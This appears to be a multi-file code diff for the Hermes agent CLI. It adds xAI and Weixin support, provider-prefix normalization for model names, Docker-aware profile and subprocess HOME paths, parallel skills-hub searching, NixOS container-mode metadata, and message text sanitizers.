help="Session source tag for filtering (default: cli). Use 'tool' for third-party integrations that should not appear in user session lists."
|
||||
)
|
||||
chat_parser.add_argument(
|
||||
"--host",
|
||||
action="store_true",
|
||||
default=False,
|
||||
help="Run on the host even when NixOS container mode is active (bypass container exec)"
|
||||
)
|
||||
chat_parser.set_defaults(func=cmd_chat)
|
||||
|
||||
# =========================================================================
|
||||
|
||||
@@ -76,17 +76,22 @@ _STRIP_VENDOR_ONLY_PROVIDERS: frozenset[str] = frozenset({
|
||||
"copilot-acp",
|
||||
})
|
||||
|
||||
# Providers whose own naming is authoritative -- pass through unchanged.
|
||||
_PASSTHROUGH_PROVIDERS: frozenset[str] = frozenset({
|
||||
# Providers whose native naming is authoritative -- pass through unchanged.
|
||||
_AUTHORITATIVE_NATIVE_PROVIDERS: frozenset[str] = frozenset({
|
||||
"gemini",
|
||||
"huggingface",
|
||||
"openai-codex",
|
||||
})
|
||||
|
||||
# Direct providers that accept bare native names but should repair a matching
|
||||
# provider/ prefix when users copy the aggregator form into config.yaml.
|
||||
_MATCHING_PREFIX_STRIP_PROVIDERS: frozenset[str] = frozenset({
|
||||
"zai",
|
||||
"kimi-coding",
|
||||
"minimax",
|
||||
"minimax-cn",
|
||||
"alibaba",
|
||||
"qwen-oauth",
|
||||
"huggingface",
|
||||
"openai-codex",
|
||||
"custom",
|
||||
})
|
||||
|
||||
@@ -168,6 +173,40 @@ def _dots_to_hyphens(model_name: str) -> str:
|
||||
return model_name.replace(".", "-")
|
||||
|
||||
|
||||
def _normalize_provider_alias(provider_name: str) -> str:
|
||||
"""Resolve provider aliases to Hermes' canonical ids."""
|
||||
raw = (provider_name or "").strip().lower()
|
||||
if not raw:
|
||||
return raw
|
||||
try:
|
||||
from hermes_cli.models import normalize_provider
|
||||
|
||||
return normalize_provider(raw)
|
||||
except Exception:
|
||||
return raw
|
||||
|
||||
|
||||
def _strip_matching_provider_prefix(model_name: str, target_provider: str) -> str:
|
||||
"""Strip ``provider/`` only when the prefix matches the target provider.
|
||||
|
||||
This prevents arbitrary slash-bearing model IDs from being mangled on
|
||||
native providers while still repairing manual config values like
|
||||
``zai/glm-5.1`` for the ``zai`` provider.
|
||||
"""
|
||||
if "/" not in model_name:
|
||||
return model_name
|
||||
|
||||
prefix, remainder = model_name.split("/", 1)
|
||||
if not prefix.strip() or not remainder.strip():
|
||||
return model_name
|
||||
|
||||
normalized_prefix = _normalize_provider_alias(prefix)
|
||||
normalized_target = _normalize_provider_alias(target_provider)
|
||||
if normalized_prefix and normalized_prefix == normalized_target:
|
||||
return remainder.strip()
|
||||
return model_name
|
||||
|
||||
|
||||
def detect_vendor(model_name: str) -> Optional[str]:
|
||||
"""Detect the vendor slug from a bare model name.
|
||||
|
||||
@@ -305,24 +344,37 @@ def normalize_model_for_provider(model_input: str, target_provider: str) -> str:
|
||||
if not name:
|
||||
return name
|
||||
|
||||
provider = (target_provider or "").strip().lower()
|
||||
provider = _normalize_provider_alias(target_provider)
|
||||
|
||||
# --- Aggregators: need vendor/model format ---
|
||||
if provider in _AGGREGATOR_PROVIDERS:
|
||||
return _prepend_vendor(name)
|
||||
|
||||
# --- Anthropic / OpenCode: strip vendor, dots -> hyphens ---
|
||||
# --- Anthropic / OpenCode: strip matching provider prefix, dots -> hyphens ---
|
||||
if provider in _DOT_TO_HYPHEN_PROVIDERS:
|
||||
bare = _strip_vendor_prefix(name)
|
||||
bare = _strip_matching_provider_prefix(name, provider)
|
||||
if "/" in bare:
|
||||
return bare
|
||||
return _dots_to_hyphens(bare)
|
||||
|
||||
# --- Copilot: strip vendor, keep dots ---
|
||||
# --- Copilot: strip matching provider prefix, keep dots ---
|
||||
if provider in _STRIP_VENDOR_ONLY_PROVIDERS:
|
||||
return _strip_vendor_prefix(name)
|
||||
return _strip_matching_provider_prefix(name, provider)
|
||||
|
||||
# --- DeepSeek: map to one of two canonical names ---
|
||||
if provider == "deepseek":
|
||||
return _normalize_for_deepseek(name)
|
||||
bare = _strip_matching_provider_prefix(name, provider)
|
||||
if "/" in bare:
|
||||
return bare
|
||||
return _normalize_for_deepseek(bare)
|
||||
|
||||
# --- Direct providers: repair matching provider prefixes only ---
|
||||
if provider in _MATCHING_PREFIX_STRIP_PROVIDERS:
|
||||
return _strip_matching_provider_prefix(name, provider)
|
||||
|
||||
# --- Authoritative native providers: preserve user-facing slugs as-is ---
|
||||
if provider in _AUTHORITATIVE_NATIVE_PROVIDERS:
|
||||
return name
|
||||
|
||||
# --- Custom & all others: pass through as-is ---
|
||||
return name
|
||||
|
||||
@@ -809,42 +809,69 @@ def list_authenticated_providers(
|
||||
})
|
||||
seen_slugs.add(slug)
|
||||
|
||||
# --- 2. Check Hermes-only providers (nous, openai-codex, copilot) ---
|
||||
# --- 2. Check Hermes-only providers (nous, openai-codex, copilot, opencode-go) ---
|
||||
from hermes_cli.providers import HERMES_OVERLAYS
|
||||
from hermes_cli.auth import PROVIDER_REGISTRY as _auth_registry
|
||||
|
||||
# Build reverse mapping: models.dev ID → Hermes provider ID.
|
||||
# HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot")
|
||||
# while _PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot").
|
||||
_mdev_to_hermes = {v: k for k, v in PROVIDER_TO_MODELS_DEV.items()}
|
||||
|
||||
for pid, overlay in HERMES_OVERLAYS.items():
|
||||
if pid in seen_slugs:
|
||||
continue
|
||||
|
||||
# Resolve Hermes slug — e.g. "github-copilot" → "copilot"
|
||||
hermes_slug = _mdev_to_hermes.get(pid, pid)
|
||||
if hermes_slug in seen_slugs:
|
||||
continue
|
||||
|
||||
# Check if credentials exist
|
||||
has_creds = False
|
||||
if overlay.extra_env_vars:
|
||||
has_creds = any(os.environ.get(ev) for ev in overlay.extra_env_vars)
|
||||
if overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
|
||||
# Also check api_key_env_vars from PROVIDER_REGISTRY for api_key auth_type
|
||||
if not has_creds and overlay.auth_type == "api_key":
|
||||
for _key in (pid, hermes_slug):
|
||||
pcfg = _auth_registry.get(_key)
|
||||
if pcfg and pcfg.api_key_env_vars:
|
||||
if any(os.environ.get(ev) for ev in pcfg.api_key_env_vars):
|
||||
has_creds = True
|
||||
break
|
||||
if not has_creds and overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
|
||||
# These use auth stores, not env vars — check for auth.json entries
|
||||
try:
|
||||
from hermes_cli.auth import _load_auth_store
|
||||
store = _load_auth_store()
|
||||
if store and (pid in store.get("providers", {}) or pid in store.get("credential_pool", {})):
|
||||
providers_store = store.get("providers", {})
|
||||
pool_store = store.get("credential_pool", {})
|
||||
if store and (
|
||||
pid in providers_store or hermes_slug in providers_store
|
||||
or pid in pool_store or hermes_slug in pool_store
|
||||
):
|
||||
has_creds = True
|
||||
except Exception as exc:
|
||||
logger.debug("Auth store check failed for %s: %s", pid, exc)
|
||||
if not has_creds:
|
||||
continue
|
||||
|
||||
# Use curated list
|
||||
model_ids = curated.get(pid, [])
|
||||
# Use curated list — look up by Hermes slug, fall back to overlay key
|
||||
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
|
||||
total = len(model_ids)
|
||||
top = model_ids[:max_models]
|
||||
|
||||
results.append({
|
||||
"slug": pid,
|
||||
"name": get_label(pid),
|
||||
"is_current": pid == current_provider,
|
||||
"slug": hermes_slug,
|
||||
"name": get_label(hermes_slug),
|
||||
"is_current": hermes_slug == current_provider or pid == current_provider,
|
||||
"is_user_defined": False,
|
||||
"models": top,
|
||||
"total_models": total,
|
||||
"source": "hermes",
|
||||
})
|
||||
seen_slugs.add(pid)
|
||||
seen_slugs.add(hermes_slug)
|
||||
|
||||
# --- 3. User-defined endpoints from config ---
|
||||
if user_providers and isinstance(user_providers, dict):
|
||||
|
||||
@@ -129,6 +129,19 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
|
||||
"glm-4.5",
|
||||
"glm-4.5-flash",
|
||||
],
|
||||
"xai": [
|
||||
"grok-4.20-0309-reasoning",
|
||||
"grok-4.20-0309-non-reasoning",
|
||||
"grok-4.20-multi-agent-0309",
|
||||
"grok-4-1-fast-reasoning",
|
||||
"grok-4-1-fast-non-reasoning",
|
||||
"grok-4-fast-reasoning",
|
||||
"grok-4-fast-non-reasoning",
|
||||
"grok-4-0709",
|
||||
"grok-code-fast-1",
|
||||
"grok-3",
|
||||
"grok-3-mini",
|
||||
],
|
||||
"kimi-coding": [
|
||||
"kimi-for-coding",
|
||||
"kimi-k2.5",
|
||||
|
||||
+21
-6
@@ -42,6 +42,11 @@ _PROFILE_DIRS = [
|
||||
"plans",
|
||||
"workspace",
|
||||
"cron",
|
||||
# Per-profile HOME for subprocesses: isolates system tool configs (git,
|
||||
# ssh, gh, npm …) so credentials don't bleed between profiles. In Docker
|
||||
# this also ensures tool configs land inside the persistent volume.
|
||||
# See hermes_constants.get_subprocess_home() and issue #4426.
|
||||
"home",
|
||||
]
|
||||
|
||||
# Files copied during --clone (if they exist in the source)
|
||||
@@ -115,16 +120,26 @@ _HERMES_SUBCOMMANDS = frozenset({
|
||||
def _get_profiles_root() -> Path:
|
||||
"""Return the directory where named profiles are stored.
|
||||
|
||||
Always ``~/.hermes/profiles/`` — anchored to the user's home,
|
||||
NOT to the current HERMES_HOME (which may itself be a profile).
|
||||
This ensures ``coder profile list`` can see all profiles.
|
||||
Anchored to the hermes root, NOT to the current HERMES_HOME
|
||||
(which may itself be a profile). This ensures ``coder profile list``
|
||||
can see all profiles.
|
||||
|
||||
In Docker/custom deployments where HERMES_HOME points outside
|
||||
``~/.hermes``, profiles live under ``HERMES_HOME/profiles/`` so
|
||||
they persist on the mounted volume.
|
||||
"""
|
||||
return Path.home() / ".hermes" / "profiles"
|
||||
return _get_default_hermes_home() / "profiles"
|
||||
|
||||
|
||||
def _get_default_hermes_home() -> Path:
|
||||
"""Return the default (pre-profile) HERMES_HOME path."""
|
||||
return Path.home() / ".hermes"
|
||||
"""Return the default (pre-profile) HERMES_HOME path.
|
||||
|
||||
In standard deployments this is ``~/.hermes``.
|
||||
In Docker/custom deployments where HERMES_HOME is outside ``~/.hermes``
|
||||
(e.g. ``/opt/data``), returns HERMES_HOME directly.
|
||||
"""
|
||||
from hermes_constants import get_default_hermes_root
|
||||
return get_default_hermes_root()
|
||||
|
||||
|
||||
def _get_active_profile_path() -> Path:
|
||||
|
||||
@@ -127,6 +127,11 @@ HERMES_OVERLAYS: Dict[str, HermesOverlay] = {
|
||||
is_aggregator=True,
|
||||
base_url_env_var="HF_BASE_URL",
|
||||
),
|
||||
"xai": HermesOverlay(
|
||||
transport="openai_chat",
|
||||
base_url_override="https://api.x.ai/v1",
|
||||
base_url_env_var="XAI_BASE_URL",
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@@ -163,6 +168,10 @@ ALIASES: Dict[str, str] = {
|
||||
"z.ai": "zai",
|
||||
"zhipu": "zai",
|
||||
|
||||
# xai
|
||||
"x-ai": "xai",
|
||||
"x.ai": "xai",
|
||||
|
||||
# kimi-for-coding (models.dev ID)
|
||||
"kimi": "kimi-for-coding",
|
||||
"kimi-coding": "kimi-for-coding",
|
||||
@@ -341,6 +350,7 @@ def get_label(provider_id: str) -> str:
|
||||
|
||||
|
||||
|
||||
|
||||
def is_aggregator(provider: str) -> bool:
|
||||
"""Return True when the provider is a multi-model aggregator."""
|
||||
pdef = get_provider(provider)
|
||||
|
||||
@@ -338,6 +338,8 @@ def _curses_prompt_choice(question: str, choices: list, default: int = 0) -> int
|
||||
return
|
||||
|
||||
curses.wrapper(_curses_menu)
|
||||
from hermes_cli.curses_ui import flush_stdin
|
||||
flush_stdin()
|
||||
return result_holder[0]
|
||||
except Exception:
|
||||
return -1
|
||||
@@ -2028,6 +2030,12 @@ def _setup_whatsapp():
|
||||
print_info("or personal self-chat) and pair via QR code.")
|
||||
|
||||
|
||||
def _setup_weixin():
|
||||
"""Configure Weixin (personal WeChat) via iLink Bot API QR login."""
|
||||
from hermes_cli.gateway import _setup_weixin as _gateway_setup_weixin
|
||||
_gateway_setup_weixin()
|
||||
|
||||
|
||||
def _setup_bluebubbles():
|
||||
"""Configure BlueBubbles iMessage gateway."""
|
||||
print_header("BlueBubbles (iMessage)")
|
||||
@@ -2147,6 +2155,7 @@ _GATEWAY_PLATFORMS = [
|
||||
("Matrix", "MATRIX_ACCESS_TOKEN", _setup_matrix),
|
||||
("Mattermost", "MATTERMOST_TOKEN", _setup_mattermost),
|
||||
("WhatsApp", "WHATSAPP_ENABLED", _setup_whatsapp),
|
||||
("Weixin (WeChat)", "WEIXIN_ACCOUNT_ID", _setup_weixin),
|
||||
("BlueBubbles (iMessage)", "BLUEBUBBLES_SERVER_URL", _setup_bluebubbles),
|
||||
("Webhooks (GitHub, GitLab, etc.)", "WEBHOOK_ENABLED", _setup_webhooks),
|
||||
]
|
||||
|
||||
@@ -31,6 +31,7 @@ PLATFORMS = {
|
||||
"dingtalk": "💬 DingTalk",
|
||||
"feishu": "🪽 Feishu",
|
||||
"wecom": "💬 WeCom",
|
||||
"weixin": "💬 Weixin",
|
||||
"webhook": "🔗 Webhook",
|
||||
}
|
||||
|
||||
|
||||
+27
-24
@@ -151,7 +151,8 @@ def do_search(query: str, source: str = "all", limit: int = 10,
|
||||
|
||||
auth = GitHubAuth()
|
||||
sources = create_source_router(auth)
|
||||
results = unified_search(query, sources, source_filter=source, limit=limit)
|
||||
with c.status("[bold]Searching registries..."):
|
||||
results = unified_search(query, sources, source_filter=source, limit=limit)
|
||||
|
||||
if not results:
|
||||
c.print("[dim]No skills found matching your query.[/]\n")
|
||||
@@ -187,7 +188,7 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
Official skills are always shown first, regardless of source filter.
|
||||
"""
|
||||
from tools.skills_hub import (
|
||||
GitHubAuth, create_source_router,
|
||||
GitHubAuth, create_source_router, parallel_search_sources,
|
||||
)
|
||||
|
||||
# Clamp page_size to safe range
|
||||
@@ -198,27 +199,23 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
auth = GitHubAuth()
|
||||
sources = create_source_router(auth)
|
||||
|
||||
# Collect results from all (or filtered) sources
|
||||
# Use empty query to get everything; per-source limits prevent overload
|
||||
# Collect results from all (or filtered) sources in parallel.
|
||||
# Per-source limits are generous — parallelism + 30s timeout cap prevents hangs.
|
||||
_TRUST_RANK = {"builtin": 3, "trusted": 2, "community": 1}
|
||||
_PER_SOURCE_LIMIT = {"official": 100, "skills-sh": 100, "well-known": 25, "github": 100, "clawhub": 50,
|
||||
"claude-marketplace": 50, "lobehub": 50}
|
||||
_PER_SOURCE_LIMIT = {
|
||||
"official": 200, "skills-sh": 200, "well-known": 50,
|
||||
"github": 200, "clawhub": 500, "claude-marketplace": 100,
|
||||
"lobehub": 500,
|
||||
}
|
||||
|
||||
all_results: list = []
|
||||
source_counts: dict = {}
|
||||
|
||||
for src in sources:
|
||||
sid = src.source_id()
|
||||
if source != "all" and sid != source and sid != "official":
|
||||
# Always include official source for the "first" placement
|
||||
continue
|
||||
try:
|
||||
limit = _PER_SOURCE_LIMIT.get(sid, 50)
|
||||
results = src.search("", limit=limit)
|
||||
source_counts[sid] = len(results)
|
||||
all_results.extend(results)
|
||||
except Exception:
|
||||
continue
|
||||
with c.status("[bold]Fetching skills from registries..."):
|
||||
all_results, source_counts, timed_out = parallel_search_sources(
|
||||
sources,
|
||||
query="",
|
||||
per_source_limits=_PER_SOURCE_LIMIT,
|
||||
source_filter=source,
|
||||
overall_timeout=30,
|
||||
)
|
||||
|
||||
if not all_results:
|
||||
c.print("[dim]No skills found in the Skills Hub.[/]\n")
|
||||
@@ -252,8 +249,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
|
||||
# Build header
|
||||
source_label = f"— {source}" if source != "all" else "— all sources"
|
||||
loaded_label = f"{total} skills loaded"
|
||||
if timed_out:
|
||||
loaded_label += f", {len(timed_out)} source(s) still loading"
|
||||
c.print(f"\n[bold]Skills Hub — Browse {source_label}[/]"
|
||||
f" [dim]({total} skills, page {page}/{total_pages})[/]")
|
||||
f" [dim]({loaded_label}, page {page}/{total_pages})[/]")
|
||||
if official_count > 0 and page == 1:
|
||||
c.print(f"[bright_cyan]★ {official_count} official optional skill(s) from Nous Research[/]")
|
||||
c.print()
|
||||
@@ -300,8 +300,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
parts = [f"{sid}: {ct}" for sid, ct in sorted(source_counts.items())]
|
||||
c.print(f" [dim]Sources: {', '.join(parts)}[/]")
|
||||
|
||||
c.print("[dim]Use: hermes skills inspect <identifier> to preview, "
|
||||
"hermes skills install <identifier> to install[/]\n")
|
||||
if timed_out:
|
||||
c.print(f" [yellow]⚡ Slow sources skipped: {', '.join(timed_out)} "
|
||||
f"— run again for cached results[/]")
|
||||
|
||||
c.print("[dim]Tip: 'hermes skills search <query>' searches deeper across all registries[/]\n")
|
||||
|
||||
|
||||
def do_install(identifier: str, category: str = "", force: bool = False,
|
||||
|
||||
@@ -305,6 +305,7 @@ def show_status(args):
|
||||
"DingTalk": ("DINGTALK_CLIENT_ID", None),
|
||||
"Feishu": ("FEISHU_APP_ID", "FEISHU_HOME_CHANNEL"),
|
||||
"WeCom": ("WECOM_BOT_ID", "WECOM_HOME_CHANNEL"),
|
||||
"Weixin": ("WEIXIN_ACCOUNT_ID", "WEIXIN_HOME_CHANNEL"),
|
||||
"BlueBubbles": ("BLUEBUBBLES_SERVER_URL", "BLUEBUBBLES_HOME_CHANNEL"),
|
||||
}
|
||||
|
||||
|
||||
@@ -133,6 +133,7 @@ PLATFORMS = {
|
||||
"dingtalk": {"label": "💬 DingTalk", "default_toolset": "hermes-dingtalk"},
|
||||
"feishu": {"label": "🪽 Feishu", "default_toolset": "hermes-feishu"},
|
||||
"wecom": {"label": "💬 WeCom", "default_toolset": "hermes-wecom"},
|
||||
"weixin": {"label": "💬 Weixin", "default_toolset": "hermes-weixin"},
|
||||
"api_server": {"label": "🌐 API Server", "default_toolset": "hermes-api-server"},
|
||||
"mattermost": {"label": "💬 Mattermost", "default_toolset": "hermes-mattermost"},
|
||||
"webhook": {"label": "🔗 Webhook", "default_toolset": "hermes-webhook"},
|
||||
@@ -720,6 +721,8 @@ def _prompt_choice(question: str, choices: list, default: int = 0) -> int:
|
||||
return
|
||||
|
||||
curses.wrapper(_curses_menu)
|
||||
from hermes_cli.curses_ui import flush_stdin
|
||||
flush_stdin()
|
||||
return result_holder[0]
|
||||
|
||||
except Exception:
|
||||
|
||||
@@ -17,6 +17,45 @@ def get_hermes_home() -> Path:
|
||||
return Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
|
||||
|
||||
|
||||
def get_default_hermes_root() -> Path:
|
||||
"""Return the root Hermes directory for profile-level operations.
|
||||
|
||||
In standard deployments this is ``~/.hermes``.
|
||||
|
||||
In Docker or custom deployments where ``HERMES_HOME`` points outside
|
||||
``~/.hermes`` (e.g. ``/opt/data``), returns ``HERMES_HOME`` directly
|
||||
— that IS the root.
|
||||
|
||||
In profile mode where ``HERMES_HOME`` is ``<root>/profiles/<name>``,
|
||||
returns ``<root>`` so that ``profile list`` can see all profiles.
|
||||
Works both for standard (``~/.hermes/profiles/coder``) and Docker
|
||||
(``/opt/data/profiles/coder``) layouts.
|
||||
|
||||
Import-safe — no dependencies beyond stdlib.
|
||||
"""
|
||||
native_home = Path.home() / ".hermes"
|
||||
env_home = os.environ.get("HERMES_HOME", "")
|
||||
if not env_home:
|
||||
return native_home
|
||||
env_path = Path(env_home)
|
||||
try:
|
||||
env_path.resolve().relative_to(native_home.resolve())
|
||||
# HERMES_HOME is under ~/.hermes (normal or profile mode)
|
||||
return native_home
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
# Docker / custom deployment.
|
||||
# Check if this is a profile path: <root>/profiles/<name>
|
||||
# If the immediate parent dir is named "profiles", the root is
|
||||
# the grandparent — this covers Docker profiles correctly.
|
||||
if env_path.parent.name == "profiles":
|
||||
return env_path.parent.parent
|
||||
|
||||
# Not a profile path — HERMES_HOME itself is the root
|
||||
return env_path
|
||||
|
||||
|
||||
def get_optional_skills_dir(default: Path | None = None) -> Path:
|
||||
"""Return the optional-skills directory, honoring package-manager wrappers.
|
||||
|
||||
@@ -72,6 +111,32 @@ def display_hermes_home() -> str:
|
||||
return str(home)
|
||||
|
||||
|
||||
def get_subprocess_home() -> str | None:
|
||||
"""Return a per-profile HOME directory for subprocesses, or None.
|
||||
|
||||
When ``{HERMES_HOME}/home/`` exists on disk, subprocesses should use it
|
||||
as ``HOME`` so system tools (git, ssh, gh, npm …) write their configs
|
||||
inside the Hermes data directory instead of the OS-level ``/root`` or
|
||||
``~/``. This provides:
|
||||
|
||||
* **Docker persistence** — tool configs land inside the persistent volume.
|
||||
* **Profile isolation** — each profile gets its own git identity, SSH
|
||||
keys, gh tokens, etc.
|
||||
|
||||
The Python process's own ``os.environ["HOME"]`` and ``Path.home()`` are
|
||||
**never** modified — only subprocess environments should inject this value.
|
||||
Activation is directory-based: if the ``home/`` subdirectory doesn't
|
||||
exist, returns ``None`` and behavior is unchanged.
|
||||
"""
|
||||
hermes_home = os.getenv("HERMES_HOME")
|
||||
if not hermes_home:
|
||||
return None
|
||||
profile_home = os.path.join(hermes_home, "home")
|
||||
if os.path.isdir(profile_home):
|
||||
return profile_home
|
||||
return None
|
||||
|
||||
|
||||
VALID_REASONING_EFFORTS = ("minimal", "low", "medium", "high", "xhigh")
|
||||
|
||||
|
||||
|
||||
@@ -611,6 +611,22 @@
|
||||
chown ${cfg.user}:${cfg.group} ${cfg.stateDir}/.hermes/.managed
|
||||
chmod 0644 ${cfg.stateDir}/.hermes/.managed
|
||||
|
||||
# Container mode metadata — tells the host CLI to exec into the
|
||||
# container instead of running locally. Removed when container mode
|
||||
# is disabled so the host CLI falls back to native execution.
|
||||
${if cfg.container.enable then ''
|
||||
cat > ${cfg.stateDir}/.hermes/.container-mode <<'HERMES_CONTAINER_MODE_EOF'
|
||||
# Written by NixOS activation script. Do not edit manually.
|
||||
backend=${cfg.container.backend}
|
||||
container_name=${containerName}
|
||||
hermes_bin=${containerDataDir}/current-package/bin/hermes
|
||||
HERMES_CONTAINER_MODE_EOF
|
||||
chown ${cfg.user}:${cfg.group} ${cfg.stateDir}/.hermes/.container-mode
|
||||
chmod 0644 ${cfg.stateDir}/.hermes/.container-mode
|
||||
'' else ''
|
||||
rm -f ${cfg.stateDir}/.hermes/.container-mode
|
||||
''}
|
||||
|
||||
# Seed auth file if provided
|
||||
${lib.optionalString (cfg.authFile != null) ''
|
||||
${if cfg.authFileForceOverwrite then ''
|
||||
|
||||
+5
-5
@@ -16,7 +16,7 @@ dependencies = [
|
||||
"anthropic>=0.39.0,<1",
|
||||
"python-dotenv>=1.2.1,<2",
|
||||
"fire>=0.7.1,<1",
|
||||
"httpx>=0.28.1,<1",
|
||||
"httpx[socks]>=0.28.1,<1",
|
||||
"rich>=14.3.3,<15",
|
||||
"tenacity>=9.1.4,<10",
|
||||
"pyyaml>=6.0.2,<7",
|
||||
@@ -88,10 +88,10 @@ all = [
|
||||
"hermes-agent[modal]",
|
||||
"hermes-agent[daytona]",
|
||||
"hermes-agent[messaging]",
|
||||
# matrix excluded: python-olm (required by matrix-nio[e2e]) is upstream-broken
|
||||
# on modern macOS (archived libolm, C++ errors with Clang 21+). Including it
|
||||
# here causes the entire [all] install to fail, dropping all other extras.
|
||||
# Users who need Matrix can install manually: pip install 'hermes-agent[matrix]'
|
||||
# matrix: python-olm (required by matrix-nio[e2e]) is upstream-broken on
|
||||
# modern macOS (archived libolm, C++ errors with Clang 21+). On Linux the
|
||||
# [matrix] extra's own marker pulls in the [e2e] variant automatically.
|
||||
"hermes-agent[matrix]; sys_platform == 'linux'",
|
||||
"hermes-agent[cron]",
|
||||
"hermes-agent[cli]",
|
||||
"hermes-agent[dev]",
|
||||
|
||||
+219
-39
@@ -359,8 +359,9 @@ def _sanitize_surrogates(text: str) -> str:
|
||||
def _sanitize_messages_surrogates(messages: list) -> bool:
|
||||
"""Sanitize surrogate characters from all string content in a messages list.
|
||||
|
||||
Walks message dicts in-place. Returns True if any surrogates were found
|
||||
and replaced, False otherwise.
|
||||
Walks message dicts in-place. Returns True if any surrogates were found
|
||||
and replaced, False otherwise. Covers content/text, name, and tool call
|
||||
metadata/arguments so retries don't fail on a non-content field.
|
||||
"""
|
||||
found = False
|
||||
for msg in messages:
|
||||
@@ -377,6 +378,88 @@ def _sanitize_messages_surrogates(messages: list) -> bool:
|
||||
if isinstance(text, str) and _SURROGATE_RE.search(text):
|
||||
part["text"] = _SURROGATE_RE.sub('\ufffd', text)
|
||||
found = True
|
||||
name = msg.get("name")
|
||||
if isinstance(name, str) and _SURROGATE_RE.search(name):
|
||||
msg["name"] = _SURROGATE_RE.sub('\ufffd', name)
|
||||
found = True
|
||||
tool_calls = msg.get("tool_calls")
|
||||
if isinstance(tool_calls, list):
|
||||
for tc in tool_calls:
|
||||
if not isinstance(tc, dict):
|
||||
continue
|
||||
tc_id = tc.get("id")
|
||||
if isinstance(tc_id, str) and _SURROGATE_RE.search(tc_id):
|
||||
tc["id"] = _SURROGATE_RE.sub('\ufffd', tc_id)
|
||||
found = True
|
||||
fn = tc.get("function")
|
||||
if isinstance(fn, dict):
|
||||
fn_name = fn.get("name")
|
||||
if isinstance(fn_name, str) and _SURROGATE_RE.search(fn_name):
|
||||
fn["name"] = _SURROGATE_RE.sub('\ufffd', fn_name)
|
||||
found = True
|
||||
fn_args = fn.get("arguments")
|
||||
if isinstance(fn_args, str) and _SURROGATE_RE.search(fn_args):
|
||||
fn["arguments"] = _SURROGATE_RE.sub('\ufffd', fn_args)
|
||||
found = True
|
||||
return found
|
||||
|
||||
|
||||
def _strip_non_ascii(text: str) -> str:
|
||||
"""Remove non-ASCII characters, replacing with closest ASCII equivalent or removing.
|
||||
|
||||
Used as a last resort when the system encoding is ASCII and can't handle
|
||||
any non-ASCII characters (e.g. LANG=C on Chromebooks).
|
||||
"""
|
||||
return text.encode('ascii', errors='ignore').decode('ascii')
|
||||
|
||||
|
||||
def _sanitize_messages_non_ascii(messages: list) -> bool:
|
||||
"""Strip non-ASCII characters from all string content in a messages list.
|
||||
|
||||
This is a last-resort recovery for systems with ASCII-only encoding
|
||||
(LANG=C, Chromebooks, minimal containers). Returns True if any
|
||||
non-ASCII content was found and sanitized.
|
||||
"""
|
||||
found = False
|
||||
for msg in messages:
|
||||
if not isinstance(msg, dict):
|
||||
continue
|
||||
# Sanitize content (string)
|
||||
content = msg.get("content")
|
||||
if isinstance(content, str):
|
||||
sanitized = _strip_non_ascii(content)
|
||||
if sanitized != content:
|
||||
msg["content"] = sanitized
|
||||
found = True
|
||||
elif isinstance(content, list):
|
||||
for part in content:
|
||||
if isinstance(part, dict):
|
||||
text = part.get("text")
|
||||
if isinstance(text, str):
|
||||
sanitized = _strip_non_ascii(text)
|
||||
if sanitized != text:
|
||||
part["text"] = sanitized
|
||||
found = True
|
||||
# Sanitize name field (can contain non-ASCII in tool results)
|
||||
name = msg.get("name")
|
||||
if isinstance(name, str):
|
||||
sanitized = _strip_non_ascii(name)
|
||||
if sanitized != name:
|
||||
msg["name"] = sanitized
|
||||
found = True
|
||||
# Sanitize tool_calls
|
||||
tool_calls = msg.get("tool_calls")
|
||||
if isinstance(tool_calls, list):
|
||||
for tc in tool_calls:
|
||||
if isinstance(tc, dict):
|
||||
fn = tc.get("function", {})
|
||||
if isinstance(fn, dict):
|
||||
fn_args = fn.get("arguments")
|
||||
if isinstance(fn_args, str):
|
||||
sanitized = _strip_non_ascii(fn_args)
|
||||
if sanitized != fn_args:
|
||||
fn["arguments"] = sanitized
|
||||
found = True
|
||||
return found
|
||||
|
||||
|
||||
@@ -606,6 +689,17 @@ class AIAgent:
|
||||
else:
|
||||
self.api_mode = "chat_completions"
|
||||
|
||||
try:
|
||||
from hermes_cli.model_normalize import (
|
||||
_AGGREGATOR_PROVIDERS,
|
||||
normalize_model_for_provider,
|
||||
)
|
||||
|
||||
if self.provider not in _AGGREGATOR_PROVIDERS:
|
||||
self.model = normalize_model_for_provider(self.model, self.provider)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Direct OpenAI sessions use the Responses API path. GPT-5.x tool
|
||||
# calls with reasoning are rejected on /v1/chat/completions, and
|
||||
# Hermes is a tool-using client by default.
|
||||
@@ -853,6 +947,7 @@ class AIAgent:
|
||||
client_kwargs["default_headers"] = headers
|
||||
|
||||
self.api_key = client_kwargs.get("api_key", "")
|
||||
self.base_url = client_kwargs.get("base_url", self.base_url)
|
||||
try:
|
||||
self.client = self._create_openai_client(client_kwargs, reason="agent_init", shared=True)
|
||||
if not self.quiet_mode:
|
||||
@@ -1149,6 +1244,9 @@ class AIAgent:
|
||||
except (TypeError, ValueError):
|
||||
_config_context_length = None
|
||||
|
||||
# Store for reuse in switch_model (so config override persists across model switches)
|
||||
self._config_context_length = _config_context_length
|
||||
|
||||
# Check custom_providers per-model context_length
|
||||
if _config_context_length is None:
|
||||
_custom_providers = _agent_cfg.get("custom_providers")
|
||||
@@ -1386,6 +1484,7 @@ class AIAgent:
|
||||
base_url=self.base_url,
|
||||
api_key=self.api_key,
|
||||
provider=self.provider,
|
||||
config_context_length=getattr(self, "_config_context_length", None),
|
||||
)
|
||||
self.context_compressor.model = self.model
|
||||
self.context_compressor.base_url = self.base_url
|
||||
@@ -1878,19 +1977,14 @@ class AIAgent:
|
||||
except Exception as e:
|
||||
logger.debug("Background memory/skill review failed: %s", e)
|
||||
finally:
|
||||
# Explicitly close the OpenAI/httpx client so GC doesn't
|
||||
